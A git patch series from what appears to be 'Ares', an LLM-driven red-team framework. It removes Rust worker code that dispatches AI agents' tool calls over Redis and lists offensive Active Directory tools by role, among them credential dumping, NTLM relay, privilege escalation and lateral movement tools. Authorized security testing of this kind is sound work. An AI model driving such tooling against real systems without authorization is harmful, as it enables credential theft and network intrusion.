TaskResult}; -use super::{RESULT_QUEUE_PREFIX, RESULT_TTL, TASK_STATUS_PREFIX, TASK_STATUS_TTL}; - -/// Process a single task: set status, run agent, push result. -pub async fn process_task( - conn: &mut redis::aio::ConnectionManager, - config: &WorkerConfig, - task: &TaskMessage, -) { - let started_at = Utc::now().to_rfc3339(); - - info!( - task_id = %task.task_id, - task_type = %task.task_type, - agent = %config.agent_name, - "Processing task" - ); - - // 1. Set task status to "running" - if let Err(e) = set_task_status( - conn, - &task.task_id, - "running", - &serde_json::json!({ - "operation_id": config.operation_id, - "role": config.worker_role, - "agent_name": config.agent_name, - "pod_name": config.pod_name, - "task_type": task.task_type, - "payload": task.payload, - "started_at": started_at, - }), - ) - .await - { - warn!(task_id = %task.task_id, "Failed to set task status to running: {e}"); - } - - // 2. Run the agent task - let agent_result = run_agent_task(&task.task_type, &task.payload, config.task_timeout).await; - - // 3. Extract token usage before consuming agent_result (for Redis tracking) - let usage_for_tracking = agent_result.as_ref().ok().and_then(|ar| ar.usage.clone()); - - // 4. Build the result - let (task_result, final_status) = match agent_result { - Ok(ar) => { - if let Some(ref err) = ar.error { - // Agent returned an error (e.g., unsupported task, max steps, model refusal) - let result_payload = serde_json::json!({ - "output": ar.output, - "task_type": task.task_type, - }); - ( - TaskResult::failure( - &task.task_id, - err.clone(), - Some(result_payload), - &config.pod_name, - &config.agent_name, - ), - "failed", - ) - } else { - let mut result_payload = serde_json::json!({ - "output": ar.output, - "task_type": task.task_type, - }); - // Include usage metrics if available - if let Some(ref usage) = ar.usage { - result_payload["usage"] = serde_json::to_value(usage).unwrap_or_default(); - } - // Include structured discoveries parsed from tool output - if let Some(ref disc) = ar.discoveries { - if let Some(obj) = disc.as_object() { - for (k, v) in obj { - result_payload[k] = v.clone(); - } - } - } - ( - TaskResult::success( - &task.task_id, - result_payload, - &config.pod_name, - &config.agent_name, - ), - "completed", - ) - } - } - Err(e) => { - let error_msg = format!("{e}"); - error!( - task_id = %task.task_id, - "Agent task failed: {error_msg}" - ); - ( - TaskResult::failure( - &task.task_id, - error_msg, - None, - &config.pod_name, - &config.agent_name, - ), - "failed", - ) - } - }; - - // 5. Accumulate token usage to Redis (best-effort, never fails the task) - if let Some(ref usage) = usage_for_tracking { - if usage.total_tokens > 0 { - if let Some(ref op_id) = config.operation_id { - let model = usage.model.as_deref().unwrap_or(""); - if let Err(e) = token_usage::increment_token_usage( - conn, - op_id, - usage.input_tokens, - usage.output_tokens, - model, - ) - .await - { - debug!(task_id = %task.task_id, "Failed to increment token usage: {e}"); - } - } - } - } - - // 6. LPUSH result to ares:results:{task_id} - let result_key = format!("{RESULT_QUEUE_PREFIX}:{}", task.task_id); - match serde_json::to_string(&task_result) { - Ok(result_json) => { - if let Err(e) = push_result(conn, &result_key, &result_json).await { - error!(task_id = %task.task_id, "Failed to push result: {e}"); - } - } - Err(e) => { - error!(task_id = %task.task_id, "Failed to serialize result: {e}"); - } - } - - // 7. Update task status to final state - if let Err(e) = set_task_status( - conn, - &task.task_id, - final_status, - &serde_json::json!({ - "operation_id": config.operation_id, - "role": config.worker_role, - "agent_name": config.agent_name, - "pod_name": config.pod_name, - "task_type": task.task_type, - "ended_at": Utc::now().to_rfc3339(), - }), - ) - .await - { - warn!(task_id = %task.task_id, "Failed to set task status to {final_status}: {e}"); - } - - match final_status { - "completed" => info!(task_id = %task.task_id, "Task completed"), - _ => warn!(task_id = %task.task_id, "Task failed"), - } -} - -/// Push a result to the result queue and set TTL. -async fn push_result( - conn: &mut redis::aio::ConnectionManager, - result_key: &str, - result_json: &str, -) -> anyhow::Result<()> { - conn.lpush::<_, _, ()>(result_key, result_json).await?; - conn.expire::<_, ()>(result_key, RESULT_TTL).await?; - Ok(()) -} - -/// Set task status in Redis with TTL. -/// Matches Python's `set_task_status` — writes JSON to `ares:task_status:{task_id}`. -async fn set_task_status( - conn: &mut redis::aio::ConnectionManager, - task_id: &str, - status: &str, - extra_fields: &serde_json::Value, -) -> anyhow::Result<()> { - let key = format!("{TASK_STATUS_PREFIX}:{task_id}"); - let mut data = extra_fields.clone(); - if let Some(obj) = data.as_object_mut() { - obj.insert( - "status".to_string(), - serde_json::Value::String(status.to_string()), - ); - obj.insert( - "updated_at".to_string(), - serde_json::Value::String(Utc::now().to_rfc3339()), - ); - } - let json_str = serde_json::to_string(&data)?; - conn.set_ex::<_, _, ()>(&key, &json_str, TASK_STATUS_TTL as u64) - .await?; - Ok(()) -} diff --git a/ares-worker/src/task_loop/types.rs b/ares-worker/src/task_loop/types.rs deleted file mode 100644 index 4e5282b8..00000000 --- a/ares-worker/src/task_loop/types.rs +++ /dev/null @@ -1,180 +0,0 @@ -//! Wire types and agent result structs for the task loop. - -use chrono::Utc; -use serde::{Deserialize, Serialize}; - -// ─── Agent result types ────────────────────────────────────────────────────── - -/// Result from running an agent task. -#[derive(Debug, Clone)] -pub struct AgentResult { - /// Raw text output from the agent. - pub output: String, - /// Whether the agent encountered an error. - pub error: Option, - /// Token usage metrics from the LLM call. - pub usage: Option, - /// Structured discoveries parsed from tool output (hosts, creds, hashes, vulns). - pub discoveries: Option, -} - -/// LLM token usage counters. -#[derive(Debug, Clone, serde::Serialize)] -pub struct TokenUsage { - pub input_tokens: u64, - pub output_tokens: u64, - pub total_tokens: u64, - /// Model name (e.g. "openai/gpt-4.1-mini"). - #[serde(default, skip_serializing_if = "Option::is_none")] - pub model: Option, -} - -// ─── Wire types (match Python's Pydantic models exactly) ───────────────────── - -/// Task message from the queue. Matches `TaskMessage` in `task_queue.py`. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct TaskMessage { - pub task_id: String, - pub task_type: String, - pub source_agent: String, - pub target_agent: String, - pub payload: serde_json::Value, - #[serde(default = "default_priority")] - pub priority: i32, - pub created_at: Option, - pub callback_queue: Option, -} - -fn default_priority() -> i32 { - 5 -} - -/// Task result pushed back to orchestrator. Matches `TaskResult` in `task_queue.py`. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct TaskResult { - pub task_id: String, - pub success: bool, - #[serde(skip_serializing_if = "Option::is_none")] - pub result: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub error: Option, - pub completed_at: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub worker_pod: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub agent_name: Option, -} - -impl TaskResult { - pub fn success( - task_id: &str, - result: serde_json::Value, - pod_name: &str, - agent_name: &str, - ) -> Self { - Self { - task_id: task_id.to_string(), - success: true, - result: Some(result), - error: None, - completed_at: Some(Utc::now().to_rfc3339()), - worker_pod: Some(pod_name.to_string()), - agent_name: Some(agent_name.to_string()), - } - } - - pub fn failure( - task_id: &str, - error: String, - result: Option, - pod_name: &str, - agent_name: &str, - ) -> Self { - Self { - task_id: task_id.to_string(), - success: false, - result, - error: Some(error), - completed_at: Some(Utc::now().to_rfc3339()), - worker_pod: Some(pod_name.to_string()), - agent_name: Some(agent_name.to_string()), - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use serde_json::json; - - #[test] - fn test_task_result_success() { - let result = TaskResult::success("task-1", json!({"output": "done"}), "pod-1", "recon"); - assert!(result.success); - assert!(result.error.is_none()); - assert_eq!(result.task_id, "task-1"); - assert!(result.result.is_some()); - assert_eq!(result.worker_pod.as_deref(), Some("pod-1")); - assert_eq!(result.agent_name.as_deref(), Some("recon")); - assert!(result.completed_at.is_some()); - } - - #[test] - fn test_task_result_failure() { - let result = TaskResult::failure( - "task-2", - "timeout".to_string(), - Some(json!({"partial": true})), - "pod-1", - "lateral", - ); - assert!(!result.success); - assert_eq!(result.error.as_deref(), Some("timeout")); - assert!(result.result.is_some()); - } - - #[test] - fn test_task_result_failure_no_result() { - let result = TaskResult::failure("task-3", "crash".to_string(), None, "pod-1", "recon"); - assert!(!result.success); - assert!(result.result.is_none()); - } - - #[test] - fn test_task_message_deserialize() { - let json = json!({ - "task_id": "t-1", - "task_type": "recon", - "source_agent": "orchestrator", - "target_agent": "recon-1", - "payload": {"target_ip": "192.168.58.10"}, - "priority": 3, - "created_at": "2026-04-08T12:00:00Z" - }); - let msg: TaskMessage = serde_json::from_value(json).unwrap(); - assert_eq!(msg.task_id, "t-1"); - assert_eq!(msg.task_type, "recon"); - assert_eq!(msg.priority, 3); - assert!(msg.callback_queue.is_none()); - } - - #[test] - fn test_task_message_default_priority() { - let json = json!({ - "task_id": "t-1", - "task_type": "recon", - "source_agent": "orchestrator", - "target_agent": "recon-1", - "payload": {} - }); - let msg: TaskMessage = serde_json::from_value(json).unwrap(); - assert_eq!(msg.priority, 5); // default - } - - #[test] - fn test_task_result_serialization_skips_none() { - let result = TaskResult::success("t-1", json!({"ok": true}), "pod-1", "recon"); - let serialized = serde_json::to_value(&result).unwrap(); - assert!(serialized.get("error").is_none()); - } -} diff --git a/ares-worker/src/tool_check.rs b/ares-worker/src/tool_check.rs deleted file mode 100644 index 52eb9c9b..00000000 --- a/ares-worker/src/tool_check.rs +++ /dev/null @@ -1,273 +0,0 @@ -//! Tool availability check at worker startup. -//! -//! Probes which external binaries are installed so we can log warnings -//! for missing tools and optionally report the inventory to the orchestrator -//! via Redis. -//! -//! Tool lists are generated at compile time from `tools.yaml` by -//! `build.rs`. See that file for the authoritative reference of expected -//! tools per role. - -use std::collections::BTreeMap; - -use tracing::{info, warn}; - -// Pull in `WORKER_ROLES` and `tools_for_role()` generated by build.rs -// from tools.yaml. -include!(concat!(env!("OUT_DIR"), "/tool_tables.rs")); - -/// Check which tools are available in $PATH for the given role. -/// -/// Returns a map of tool_name → available (true/false). -/// Logs warnings for missing tools but does not fail. -pub async fn check_tools(role: &str) -> BTreeMap { - let tools = tools_for_role(role); - let mut inventory = BTreeMap::new(); - - for &tool in tools { - let available = is_in_path(tool).await; - inventory.insert(tool.to_string(), available); - } - - let available: Vec<&str> = inventory - .iter() - .filter(|(_, &v)| v) - .map(|(k, _)| k.as_str()) - .collect(); - let missing: Vec<&str> = inventory - .iter() - .filter(|(_, &v)| !v) - .map(|(k, _)| k.as_str()) - .collect(); - - info!( - role = role, - available_count = available.len(), - missing_count = missing.len(), - "Tool availability check complete" - ); - - if !missing.is_empty() { - warn!( - role = role, - missing = ?missing, - "Some tools are not installed — tasks requiring them will fail" - ); - } - - inventory -} - -/// Publish tool inventory to Redis so the orchestrator can see what -/// each worker has available. -pub async fn publish_inventory( - conn: &mut redis::aio::ConnectionManager, - agent_name: &str, - inventory: &BTreeMap, -) { - use redis::AsyncCommands; - - let key = format!("ares:tools:{agent_name}"); - let available: Vec<&str> = inventory - .iter() - .filter(|(_, &v)| v) - .map(|(k, _)| k.as_str()) - .collect(); - - match serde_json::to_string(&available) { - Ok(json) => { - let result: Result<(), _> = conn.set_ex(&key, &json, 3600).await; - if let Err(e) = result { - warn!("Failed to publish tool inventory: {e}"); - } - } - Err(e) => warn!("Failed to serialize tool inventory: {e}"), - } -} - -/// Check if a binary is available in PATH using `which`. -async fn is_in_path(binary: &str) -> bool { - tokio::process::Command::new("which") - .arg(binary) - .stdout(std::process::Stdio::null()) - .stderr(std::process::Stdio::null()) - .status() - .await - .is_ok_and(|s| s.success()) -} - -#[cfg(test)] -mod tests { - use super::*; - - /// All known worker roles must have a non-empty tool list. - #[test] - fn all_roles_have_tools() { - for role in WORKER_ROLES { - let tools = tools_for_role(role); - assert!(!tools.is_empty(), "Role {role} should have tools"); - } - } - - #[test] - fn unknown_role_returns_empty() { - assert!(tools_for_role("nonexistent").is_empty()); - } - - /// No duplicate entries within a single role's tool list. - #[test] - fn no_duplicate_tools_per_role() { - for role in WORKER_ROLES { - let tools = tools_for_role(role); - let mut seen = std::collections::HashSet::new(); - for tool in tools { - assert!( - seen.insert(tool), - "Duplicate tool '{tool}' in role '{role}'" - ); - } - } - } - - // --------------------------------------------------------------- - // Per-role expected tool assertions. - // - // These validate that tools.yaml contains the expected tools. - // When Ansible provisioning changes, update tools.yaml. - // --------------------------------------------------------------- - - #[test] - fn recon_has_expected_tools() { - let tools = tools_for_role("recon"); - for expected in &[ - "nmap", - "netexec", - "bloodhound-python", - "ldapsearch", - "enum4linux", - "certipy", - "impacket-GetNPUsers", - "impacket-GetUserSPNs", - ] { - assert!( - tools.contains(expected), - "recon missing expected tool: {expected}" - ); - } - } - - #[test] - fn credential_access_has_expected_tools() { - let tools = tools_for_role("credential_access"); - for expected in &[ - "impacket-GetUserSPNs", - "impacket-GetNPUsers", - "impacket-secretsdump", - "lsassy", - "smbclient", - "gMSADumper", - ] { - assert!( - tools.contains(expected), - "credential_access missing expected tool: {expected}" - ); - } - // netexec is NOT installed on credential_access (only on RECON) - assert!( - !tools.contains(&"netexec"), - "credential_access must NOT have netexec (recon-only)" - ); - } - - #[test] - fn cracker_has_expected_tools() { - let tools = tools_for_role("cracker"); - assert!(tools.contains(&"hashcat")); - assert!(tools.contains(&"john")); - } - - #[test] - fn acl_has_expected_tools() { - let tools = tools_for_role("acl"); - for expected in &["bloodyAD", "pywhisker", "impacket-dacledit", "rpcclient"] { - assert!( - tools.contains(expected), - "acl missing expected tool: {expected}" - ); - } - } - - #[test] - fn privesc_has_expected_tools() { - let tools = tools_for_role("privesc"); - for expected in &[ - "certipy", - "lsassy", - "nopac", - "printnightmare", - "printerbug", - "addspn", - "dnstool", - "impacket-findDelegation", - "impacket-getST", - "impacket-ticketer", - "impacket-secretsdump", - "impacket-psexec", - "KrbRelayUp", - ] { - assert!( - tools.contains(expected), - "privesc missing expected tool: {expected}" - ); - } - } - - #[test] - fn lateral_has_expected_tools() { - let tools = tools_for_role("lateral"); - for expected in &[ - "evil-winrm", - "impacket-psexec", - "impacket-wmiexec", - "impacket-smbexec", - "impacket-secretsdump", - "xfreerdp", - "sshpass", - "proxychains4", - "pth-winexe", - ] { - assert!( - tools.contains(expected), - "lateral missing expected tool: {expected}" - ); - } - } - - #[test] - fn coercion_has_expected_tools() { - let tools = tools_for_role("coercion"); - for expected in &[ - "responder", - "mitm6", - "coercer", - "dfscoerce", - "printerbug", - "addspn", - "dnstool", - "impacket-ntlmrelayx", - ] { - assert!( - tools.contains(expected), - "coercion missing expected tool: {expected}" - ); - } - } - - #[tokio::test] - async fn which_finds_basic_commands() { - // `which` itself should always be available - assert!(is_in_path("which").await); - // A nonsense binary should not be found - assert!(!is_in_path("nonexistent_binary_xyz_12345").await); - } -} diff --git a/ares-worker/src/tool_executor.rs b/ares-worker/src/tool_executor.rs deleted file mode 100644 index 8b45b849..00000000 --- a/ares-worker/src/tool_executor.rs +++ /dev/null @@ -1,452 +0,0 @@ -//! Thin tool executor loop for LLM-driven orchestration. -//! -//! When the Rust orchestrator drives agent loops via `ARES_LLM_MODEL`, it -//! dispatches individual tool calls to `ares:tool_exec:{role}` and waits -//! for results on `ares:tool_results:{call_id}`. -//! -//! This module implements the worker-side consumer: -//! -//! ```text -//! loop { -//! 1. BRPOP from ares:tool_exec:{role} -//! 2. Deserialize ToolExecRequest -//! 3. Execute tool via ares_tools::dispatch() -//! 4. Serialize ToolExecResponse -//! 5. LPUSH to ares:tool_results:{call_id} -//! } -//! ``` -//! - -use std::sync::Arc; -use std::time::Duration; - -use redis::AsyncCommands; -use serde::{Deserialize, Serialize}; -use tracing::{debug, error, info, warn, Instrument}; - -use ares_core::telemetry::propagation::set_span_parent; -use ares_core::telemetry::spans::{trace_discovery, AgentSpanBuilder, SpanKind, Team}; -use ares_core::telemetry::target::{extract_target_info, infer_target_type_from_info}; - -use crate::config::WorkerConfig; -use crate::heartbeat::WorkerStatus; - -// ─── Redis key prefixes (must match orchestrator's tool_dispatcher.rs) ─────── - -const TOOL_EXEC_PREFIX: &str = "ares:tool_exec"; -const TOOL_RESULT_PREFIX: &str = "ares:tool_results"; - -/// TTL for result keys (1 hour) — matches orchestrator's RESULT_TTL_SECS. -const RESULT_TTL: i64 = 3600; - -// ─── Wire types (match orchestrator's tool_dispatcher.rs exactly) ──────────── - -/// Request from the orchestrator's RedisToolDispatcher. -#[derive(Debug, Deserialize)] -struct ToolExecRequest { - call_id: String, - task_id: String, - tool_name: String, - arguments: serde_json::Value, - /// W3C traceparent header for cross-service span linking. - #[serde(default)] - traceparent: Option, - /// Operation ID for span correlation with dashboards. - #[serde(default)] - operation_id: Option, -} - -/// Response pushed back to the orchestrator. -#[derive(Debug, Serialize)] -struct ToolExecResponse { - call_id: String, - output: String, - error: Option, - /// Structured discoveries parsed from the tool output. - #[serde(skip_serializing_if = "Option::is_none")] - discoveries: Option, -} - -// ─── Tool executor loop ───────────────────────────────────────────────────── - -/// Run the tool execution loop until shutdown is signalled. -/// -/// Consumes individual tool call requests from `ares:tool_exec:{role}` and -/// dispatches them directly to `ares_tools::dispatch()`. Results are pushed -/// back to the per-call mailbox `ares:tool_results:{call_id}`. -pub async fn run_tool_exec_loop( - config: &WorkerConfig, - conn: redis::aio::ConnectionManager, - status_tx: tokio::sync::watch::Sender, - shutdown: Arc, -) -> anyhow::Result<()> { - let queue_key = format!("{TOOL_EXEC_PREFIX}:{}", config.worker_role); - info!( - queue = %queue_key, - agent = %config.agent_name, - "Starting tool executor loop" - ); - - let mut conn = conn; - - // Track tools that failed with "not installed" so we can short-circuit - // future calls immediately without attempting to spawn the binary. - let mut unavailable_tools: std::collections::HashSet = std::collections::HashSet::new(); - - // Exponential backoff state for connection errors - let mut retry_delay = Duration::from_secs(1); - let max_retry_delay = Duration::from_secs(60); - - loop { - // Check for shutdown via select with zero-timeout - let poll_result = tokio::select! { - result = poll_tool_request(&mut conn, &queue_key, config.poll_timeout) => result, - _ = shutdown.notified() => { - info!("Tool executor: shutdown signalled, finishing"); - return Ok(()); - } - }; - - match poll_result { - Ok(Some(request)) => { - retry_delay = Duration::from_secs(1); - - // Update heartbeat to busy - let _ = status_tx.send(WorkerStatus { - status: "busy".to_string(), - current_task: Some(format!("{}:{}", request.tool_name, request.call_id)), - }); - - let ti = extract_target_info(&request.arguments); - let tt = infer_target_type_from_info(&ti); - let mut span_builder = - AgentSpanBuilder::new("tool_exec", &config.worker_role, Team::Red) - .tool(&request.tool_name) - .kind(SpanKind::Consumer); - if let Some(ref ip) = ti.target_ip { - span_builder = span_builder.target_ip(ip); - } - if let Some(ref fqdn) = ti.target_fqdn { - span_builder = span_builder.target_fqdn(fqdn); - } - if let Some(ref user) = ti.target_user { - span_builder = span_builder.target_user(user); - } - if let Some(target_type) = tt { - span_builder = span_builder.target_type(target_type); - } - if let Some(ref op) = request.operation_id { - span_builder = span_builder.operation_id(op); - } - let exec_span = span_builder.build(); - if let Some(ref tp) = request.traceparent { - set_span_parent(&exec_span, tp); - } - execute_and_respond(&mut conn, &request, &mut unavailable_tools) - .instrument(exec_span) - .await; - - // Back to idle - let _ = status_tx.send(WorkerStatus { - status: "idle".to_string(), - current_task: None, - }); - } - Ok(None) => { - // BRPOP timeout, no request — just loop - retry_delay = Duration::from_secs(1); - } - Err(e) => { - let error_str = e.to_string().to_lowercase(); - let is_conn_error = [ - "connection", - "connect", - "closed", - "timeout", - "broken pipe", - "reset", - ] - .iter() - .any(|kw| error_str.contains(kw)); - - if is_conn_error { - // ConnectionManager auto-reconnects; just back off before retrying - warn!( - delay_secs = retry_delay.as_secs(), - "Tool executor: connection error, retrying: {e}" - ); - tokio::select! { - _ = tokio::time::sleep(retry_delay) => {} - _ = shutdown.notified() => return Ok(()), - } - retry_delay = (retry_delay * 2).min(max_retry_delay); - } else { - error!("Tool executor: non-connection error: {e}"); - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(5)) => {} - _ = shutdown.notified() => return Ok(()), - } - retry_delay = Duration::from_secs(1); - } - } - } - } -} - -/// BRPOP a single tool execution request from the queue. -async fn poll_tool_request( - conn: &mut redis::aio::ConnectionManager, - queue_key: &str, - timeout: Duration, -) -> anyhow::Result> { - let result: Option<(String, String)> = redis::cmd("BRPOP") - .arg(queue_key) - .arg(timeout.as_secs() as i64) - .query_async(conn) - .await?; - - match result { - Some((_key, data)) => { - let request: ToolExecRequest = serde_json::from_str(&data)?; - debug!( - tool = %request.tool_name, - call_id = %request.call_id, - task_id = %request.task_id, - "Received tool exec request" - ); - Ok(Some(request)) - } - None => Ok(None), - } -} - -/// Execute a tool call and push the result to Redis. -/// -/// If the tool has previously failed with "not installed", short-circuits -/// immediately without attempting to spawn the binary. -async fn execute_and_respond( - conn: &mut redis::aio::ConnectionManager, - request: &ToolExecRequest, - unavailable_tools: &mut std::collections::HashSet, -) { - // Short-circuit if this tool is known to be unavailable - if unavailable_tools.contains(&request.tool_name) { - debug!( - tool = %request.tool_name, - call_id = %request.call_id, - "Skipping unavailable tool (previously failed to spawn)" - ); - let response = ToolExecResponse { - call_id: request.call_id.clone(), - output: String::new(), - error: Some(format!( - "Tool '{}' is not installed on this worker. \ - Do not call this tool again — it failed to spawn previously.", - request.tool_name - )), - discoveries: None, - }; - let result_key = format!("{TOOL_RESULT_PREFIX}:{}", request.call_id); - if let Ok(json) = serde_json::to_string(&response) { - let _ = push_result(conn, &result_key, &json).await; - } - return; - } - - info!( - tool = %request.tool_name, - call_id = %request.call_id, - task_id = %request.task_id, - "Executing tool" - ); - - let di = extract_target_info(&request.arguments); - let dt = infer_target_type_from_info(&di); - - let response = match ares_tools::dispatch(&request.tool_name, &request.arguments).await { - Ok(output) => { - // Raw output for structured parsers (need unfiltered data) - let raw = output.combined_raw(); - // Filtered output for LLM (strips MOTD, noise, etc.) - let combined = output.combined(); - let error = if output.success { - None - } else { - Some(format!("tool exited with code {:?}", output.exit_code)) - }; - - // Parse structured discoveries from raw (unfiltered) tool output - let discoveries = ares_tools::parsers::parse_tool_output( - &request.tool_name, - &raw, - &request.arguments, - ); - let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { - None - } else { - Some(discoveries) - }; - - // Emit discovery spans for observability - if let Some(ref disc) = discoveries { - if let Some(obj) = disc.as_object() { - for (disc_type, items) in obj { - let count = items.as_array().map(|a| a.len()).unwrap_or(0); - if count > 0 { - let span = trace_discovery( - disc_type, - &request.tool_name, - di.target_user.as_deref(), - None, - di.target_ip.as_deref(), - di.target_fqdn.as_deref(), - dt, - request.operation_id.as_deref(), - ); - let _guard = span.enter(); - } - } - } - } - - ToolExecResponse { - call_id: request.call_id.clone(), - output: combined, - error, - discoveries, - } - } - Err(e) => { - let err_str = e.to_string(); - // Track tools that fail because the binary is missing - if err_str.contains("failed to spawn") || err_str.contains("not installed") { - warn!( - tool = %request.tool_name, - "Tool binary not found — marking as unavailable for this session" - ); - unavailable_tools.insert(request.tool_name.clone()); - } - warn!( - tool = %request.tool_name, - call_id = %request.call_id, - err = %e, - "Tool execution failed" - ); - ToolExecResponse { - call_id: request.call_id.clone(), - output: String::new(), - error: Some(err_str), - discoveries: None, - } - } - }; - - let has_error = response.error.is_some(); - let result_key = format!("{TOOL_RESULT_PREFIX}:{}", request.call_id); - - match serde_json::to_string(&response) { - Ok(json) => { - if let Err(e) = push_result(conn, &result_key, &json).await { - error!( - call_id = %request.call_id, - "Failed to push tool result: {e}" - ); - } else { - debug!( - tool = %request.tool_name, - call_id = %request.call_id, - has_error = has_error, - "Tool result pushed" - ); - } - } - Err(e) => { - error!( - call_id = %request.call_id, - "Failed to serialize tool result: {e}" - ); - } - } -} - -/// LPUSH result and set TTL. -async fn push_result( - conn: &mut redis::aio::ConnectionManager, - result_key: &str, - result_json: &str, -) -> anyhow::Result<()> { - conn.lpush::<_, _, ()>(result_key, result_json).await?; - conn.expire::<_, ()>(result_key, RESULT_TTL).await?; - Ok(()) -} - -// ─── Tests ────────────────────────────────────────────────────────────────── - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn tool_exec_request_deserialize() { - let json = r#"{ - "call_id": "nmap_scan_abc123", - "task_id": "recon_def456", - "tool_name": "nmap_scan", - "arguments": {"target": "192.168.58.0/24"} - }"#; - let req: ToolExecRequest = serde_json::from_str(json).unwrap(); - assert_eq!(req.call_id, "nmap_scan_abc123"); - assert_eq!(req.tool_name, "nmap_scan"); - assert_eq!(req.task_id, "recon_def456"); - } - - #[test] - fn tool_exec_response_serialize() { - let resp = ToolExecResponse { - call_id: "nmap_scan_abc123".into(), - output: "Found 5 hosts".into(), - error: None, - discoveries: None, - }; - let json = serde_json::to_string(&resp).unwrap(); - assert!(json.contains("nmap_scan_abc123")); - assert!(json.contains("Found 5 hosts")); - // discoveries omitted when None - assert!(!json.contains("discoveries")); - } - - #[test] - fn tool_exec_response_with_error() { - let resp = ToolExecResponse { - call_id: "x".into(), - output: String::new(), - error: Some("Connection refused".into()), - discoveries: None, - }; - let json = serde_json::to_string(&resp).unwrap(); - let parsed: serde_json::Value = serde_json::from_str(&json).unwrap(); - assert_eq!(parsed["error"], "Connection refused"); - } - - #[test] - fn tool_exec_response_with_discoveries() { - let resp = ToolExecResponse { - call_id: "nmap_abc".into(), - output: "scan output".into(), - error: None, - discoveries: Some(serde_json::json!({ - "hosts": [{"ip": "192.168.58.10", "services": ["445/tcp"]}] - })), - }; - let json = serde_json::to_string(&resp).unwrap(); - assert!(json.contains("discoveries")); - assert!(json.contains("192.168.58.10")); - } - - #[test] - fn redis_key_prefixes_match_orchestrator() { - // These must match tool_dispatcher.rs in ares-orchestrator - assert_eq!(TOOL_EXEC_PREFIX, "ares:tool_exec"); - assert_eq!(TOOL_RESULT_PREFIX, "ares:tool_results"); - } -} From 99aa1a4d19b08de842edfdf5ae17431acfe0705e Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 11:12:20 -0600 Subject: [PATCH 06/10] fix: correct ares worker binary usage and service invocation **Changed:** - Updated the default value of `redis_ares_worker_binary` to `/usr/local/bin/ares` in both documentation and defaults to remove the hardcoded `worker` argument - Modified `ares-worker@.service.j2` template to append `worker` to the `ExecStart` command, ensuring the service runs the correct subcommand --- ansible/roles/redis/README.md | 2 +- ansible/roles/redis/defaults/main.yml | 2 +- ansible/roles/redis/templates/ares-worker@.service.j2 | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ansible/roles/redis/README.md b/ansible/roles/redis/README.md index 72e36f61..66a15b95 100644 --- a/ansible/roles/redis/README.md +++ b/ansible/roles/redis/README.md @@ -21,7 +21,7 @@ Redis server for Ares worker message broker | `redis_maxmemory` | str | 256mb | No description | | `redis_maxmemory_policy` | str | allkeys-lru | No description | | `redis_install_ares_worker_unit` | bool | True | No description | -| `redis_ares_worker_binary` | str | /usr/local/bin/ares worker | No description | +| `redis_ares_worker_binary` | str | /usr/local/bin/ares | No description | | `redis_ares_log_dir` | str | /var/log/ares | No description | | `redis_ares_config_dir` | str | /etc/ares | No description | | `redis_verify_install` | bool | False | No description | diff --git a/ansible/roles/redis/defaults/main.yml b/ansible/roles/redis/defaults/main.yml index 1280c507..ef75c6ae 100644 --- a/ansible/roles/redis/defaults/main.yml +++ b/ansible/roles/redis/defaults/main.yml @@ -7,7 +7,7 @@ redis_maxmemory_policy: "allkeys-lru" # Ares worker configuration redis_install_ares_worker_unit: true -redis_ares_worker_binary: "/usr/local/bin/ares worker" +redis_ares_worker_binary: "/usr/local/bin/ares" redis_ares_log_dir: "/var/log/ares" redis_ares_config_dir: "/etc/ares" diff --git a/ansible/roles/redis/templates/ares-worker@.service.j2 b/ansible/roles/redis/templates/ares-worker@.service.j2 index 61c57474..bc4f23c6 100644 --- a/ansible/roles/redis/templates/ares-worker@.service.j2 +++ b/ansible/roles/redis/templates/ares-worker@.service.j2 @@ -5,7 +5,7 @@ Wants=redis.service [Service] Type=simple -ExecStart={{ redis_ares_worker_binary }} +ExecStart={{ redis_ares_worker_binary }} worker Environment=ARES_REDIS_URL=redis://{{ redis_bind_address }}:{{ redis_port }} Environment=ARES_WORKER_ROLE=%i Environment=ARES_WORKER_MODE=tool_exec From bb64e0021f62a84d19a7b3f6924e15d42e56e415 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 12:25:02 -0600 Subject: [PATCH 07/10] fix: increase blue team investigation timeouts and update report structure **Changed:** - Increased investigation run timeout from 15 minutes to 45 minutes and stale threshold from 15 to 50 minutes to accommodate longer-running blue team queries and reduce premature termination - `blue/runner.rs`, `completion.rs` - Increased blue tool execution timeout from 120s to 600s to match worst-case query duration with retries and concurrency - `blue/sub_agent.rs` - Changed investigation report directory structure to include "blue/investigations" subdirectories, improving organization, and simplified report filename to remove redundant "_report" suffix - `blue/investigation.rs` - Updated blue team completion wait deadline from 20 to 45 minutes to align with increased investigation timeouts and avoid early shutdown - `completion.rs` - Updated code comment in tool executor test to clarify correct dispatcher path reference, ensuring clarity for maintenance - `worker/tool_executor.rs` **Removed:** - Removed `ares-orchestrator/ares-worker` from EC2 build source tarball to streamline build packaging and avoid unnecessary files - `.taskfiles/ec2/Taskfile.yaml` --- .taskfiles/ec2/Taskfile.yaml | 2 +- ares-cli/src/orchestrator/blue/investigation.rs | 6 ++++-- ares-cli/src/orchestrator/blue/runner.rs | 10 ++++++---- ares-cli/src/orchestrator/blue/sub_agent.rs | 4 +++- ares-cli/src/orchestrator/completion.rs | 6 +++--- ares-cli/src/worker/tool_executor.rs | 2 +- 6 files changed, 18 insertions(+), 12 deletions(-) diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml index 4e0e6ca1..19527e62 100644 --- a/.taskfiles/ec2/Taskfile.yaml +++ b/.taskfiles/ec2/Taskfile.yaml @@ -137,7 +137,7 @@ tasks: trap "rm -f $SRC_TAR" EXIT tar -czf "$SRC_TAR" \ --exclude='target' --exclude='.git' --exclude='*.o' --exclude='*.d' \ - -C "$(pwd)" Cargo.toml Cargo.lock Cross.toml tools.yaml .cargo/ ares-core/ ares-cli/ ares-llm/ ares-orchestrator/ 